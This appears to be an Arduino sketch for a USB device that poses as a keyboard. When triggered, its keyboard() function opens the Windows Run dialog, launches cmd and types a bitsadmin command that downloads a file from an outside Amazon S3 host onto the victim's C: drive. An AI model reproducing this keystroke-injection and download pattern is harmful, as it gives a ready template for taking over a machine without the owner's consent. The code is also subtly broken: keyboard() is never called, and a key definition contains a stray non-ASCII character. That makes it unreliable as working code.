#define KEY_BACKSLASH 0xЕ2 int RXLED = 17; // The RX LED has a defined Arduino pin const int buttonPin = 2; // the number of the pushbutton pin int buttonState = 0; // variable for reading the pushbutton status #include "Keyboard.h" void typeKey(uint8_t key) { Keyboard.press(key); delay(50); Keyboard.release(key); } void loop() { buttonState = digitalRead(buttonPin); if (buttonState == HIGH) { digitalWrite(RXLED, HIGH); } else { digitalWrite(RXLED, LOW); } } void setup() { pinMode(RXLED, OUTPUT); // Set RX LED as an output pinMode(buttonPin, INPUT); } void keyboard() { Keyboard.begin(); delay(500); Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); Keyboard.releaseAll(); delay(100); Keyboard.print("cmd"); Keyboard.press(KEY_RETURN); //enterrcmd Keyboard.releaseAll(); delay(100); Keyboard.print("bitsadmin /transfer wcb /priority high http://s3.amazonaws.com/rapgenius/hotdog.jpg C:\\x.jpg"); Keyboard.releaseAll(); Keyboard.press(KEY_RETURN); //enter Keyboard.releaseAll(); }